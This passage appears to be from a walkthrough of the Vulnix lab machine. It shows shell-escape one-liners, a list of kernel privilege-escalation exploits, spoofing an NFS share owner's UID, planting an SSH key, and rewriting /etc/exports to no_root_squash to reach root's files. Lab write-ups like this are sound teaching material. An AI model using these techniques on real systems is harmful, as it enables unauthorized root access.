/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/dovecot/conf.d/10-auth.conf:# We also try to handle password changes automatically: If user's previous
/etc/dovecot/conf.d/10-auth.conf:# TTL for negative hits (user not found, password mismatch).
/etc/dovecot/conf.d/10-auth.conf:# Password database is used to verify user's password (and nothing more).
/etc/dovecot/conf.d/10-auth.conf:#!include auth-checkpassword.conf.ext
/etc/dovecot/conf.d/10-ssl.conf:# If key file is password protected, give the password here. Alternatively
/etc/dovecot/conf.d/10-ssl.conf:# root owned 0600 file by using ssl_key_password = :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
Nothing interesting except for the fact that vulnix's owner and group ID’s are set to 2008.
Creation of a user with those attributes gives an option to "cd" into vulnix's share on my local host:
[GandoPC ~]# useradd vulnix -u 2008 [GandoPC ~]# su vulnix [vulnix@GandoPC root]$ cd /mnt/home/vulnix;ls -aul total 20 drwxr-x--- 2 vulnix vulnix 4096 Oct 20 01:31 . drwxr-xr-x 3 root root 4096 Aug 7 17:34 .. -rw-r--r-- 1 vulnix vulnix 220 Sep 2 2012 .bash_logout -rw-r--r-- 1 vulnix vulnix 3486 Sep 2 2012 .bashrc -rw-r--r-- 1 vulnix vulnix 675 Sep 2 2012 .profile
Gaining SSH access with "vulnix" user:
Creation of a public/private rsa key pair and copying the public key to the authorized hosts file on the vulnix host:
[vulnix@GandoPC vulnix]$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in id_rsa. Your public key has been saved in id_rsa.pub. The key fingerprint is: SHA256:ZDJcOnqM13e14G7mMI73sRKZT73V+YCRgQRDSNjIqV8 vulnix@GandoPC The key's randomart image is: +---[RSA 2048]----+ | . *.o=o.. | | =.oo .. . | | . * o .o. | | . +EB .oo . | | .o.+ S .oo+. o| | .o .+oo o.o| | o+= +.| | oo*.o. .| | ...o+ | +----[SHA256]-----+ [vulnix@GandoPC vulnix]$ cat id_rsa id_rsa id_rsa.pub [vulnix@GandoPC vulnix]$ cat id_rsa.pub > .ssh/authorized_keys
Gaining access to the host using SSH and the private key that was generated:
[vulnix@GandoPC vulnix]$ ssh -i id_rsa vulnix@192.168.43.4
The authenticity of host '192.168.43.4 (192.168.43.4)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/vulnix/.ssh/known_hosts).
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Oct 20 00:27:21 BST 2018
System load: 0.0 Processes: 88
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 4% IP address for eth0: 192.168.43.4
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sat Oct 20 00:16:28 2018 from 192.168.43.3
vulnix@vulnix:~$ whoami;ifconfig
vulnix
eth0 Link encap:Ethernet HWaddr 08:00:27:59:f8:53
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe59:f853/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2670 errors:0 dropped:0 overruns:0 frame:0
TX packets:1176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:336606 (336.6 KB) TX bytes:222571 (222.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:40 errors:0 dropped:0 overruns:0 frame:0
TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3256 (3.2 KB) TX bytes:3256 (3.2 KB)
I did some manual enumeration and I found this:
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
I turned off root_squash in /etc/exports:
vulnix@vulnix:~$ sudoedit /etc/exports vulnix@vulnix:~$ cat /etc/exports # /etc/exports: the access control list for filesystems which may be exported # to NFS clients. See exports(5). # # Example for NFSv2 and NFSv3: # /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check) # # Example for NFSv4: # /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check) # /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check) # / *(rw,no_root_squash)
In order to save those changes, I had to restart exportfs service or reboot the machine:
vulnix@vulnix:~$ reboot reboot: Need to be root vulnix@vulnix:~$ exit logout Connection to 192.168.43.4 closed. [vulnix@GandoPC vulnix]$ exit exit
No sudo, so I had to restart the VM in virtualbox :D
Capturing the trophy:
Vulnix VM restarted successfully and I got the trophy:
[GandoPC ~]# umount /mnt/home/vulnix [GandoPC ~]# showmount -e 192.168.43.4 Export list for 192.168.43.4: / * [GandoPC ~]# mkdir /mnt/vulnix_root [GandoPC ~]# mount 192.168.43.4:/ /mnt/vulnix_root [GandoPC ~]# cd /mnt/vulnix_root/root;ls -aul total 28 drwx------ 3 root root 4096 Oct 20 02:52 . drwxr-xr-x 22 root root 4096 Oct 20 02:49 .. -rw------- 1 root root 0 Sep 2 2012 .bash_history -rw-r--r-- 1 root root 3106 Sep 2 2012 .bashrc drwx------ 2 root root 4096 Sep 2 2012 .cache -rw-r--r-- 1 root root 140 Sep 2 2012 .profile -r-------- 1 root root 33 Sep 2 2012 trophy.txt -rw------- 1 root root 710 Sep 2 2012 .viminfo [GandoPC root]# cat trophy.txt cc614640424f5bd60ce5d5264899c3be